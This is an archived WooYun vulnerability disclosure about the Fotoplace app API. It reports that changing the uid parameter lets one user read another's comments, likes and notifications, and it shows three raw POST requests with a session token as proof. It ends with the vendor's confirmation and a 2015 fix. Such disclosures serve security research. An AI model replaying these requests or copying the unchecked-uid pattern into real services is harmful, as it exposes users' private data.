乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-14: 细节已通知厂商并且等待厂商处理中 2015-06-14: 厂商已经确认,细节仅向厂商公开 2015-06-24: 细节向核心白帽子及相关领域专家公开 2015-07-04: 细节向普通白帽子公开 2015-07-14: 细节向实习白帽子公开 2015-07-29: 细节向公众公开
rt
在用户消息处,多处存在修改uid就可以平行权限漏洞,可任意查看他人敏感操作信息
以id为1的足记官方账号为例评论
POST /api2/user/user_get_comment.php HTTP/1.1Host: fotoplace.ccProxy-Connection: keep-aliveAccept: */*Accept-Encoding: gzip, deflateCookie: cookie_tempuid=192.168.100.614266984861566120746Content-Type: application/x-www-form-urlencodedAccept-Language: zh-Hans;q=1, en;q=0.9Content-Length: 97Connection: keep-aliveUser-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=1&version=2.6
赞的
POST /api2/user/user_get_like_list.php HTTP/1.1Host: fotoplace.ccProxy-Connection: keep-aliveAccept: */*Accept-Encoding: gzip, deflateCookie: cookie_tempuid=192.168.100.614266984861566120746Content-Type: application/x-www-form-urlencodedAccept-Language: zh-Hans;q=1, en;q=0.9Content-Length: 103Connection: keep-aliveUser-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)offset=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6
通知
POST /api2/user/user_get_notice_list.php HTTP/1.1Host: fotoplace.ccProxy-Connection: keep-aliveAccept: */*Accept-Encoding: gzip, deflateCookie: cookie_tempuid=192.168.100.614266984861566120746Content-Type: application/x-www-form-urlencodedAccept-Language: zh-Hans;q=1, en;q=0.9Content-Length: 106Connection: keep-aliveUser-Agent: FotoPlace/15050821 (iPhone; iOS 8.1.3; Scale/2.00)pageindex=0&token=da8648e41ee0a0cf5da9da76c5aea11dc4eec6fdc39c74121ca4c2b95b76e864&uid=6146812&version=2.6
所有操作先做sign身份标记验证
危害等级:高
漏洞Rank:20
确认时间:2015-06-14 23:46
正在处理中,感谢提供漏洞信息
2015-06-16:已经修复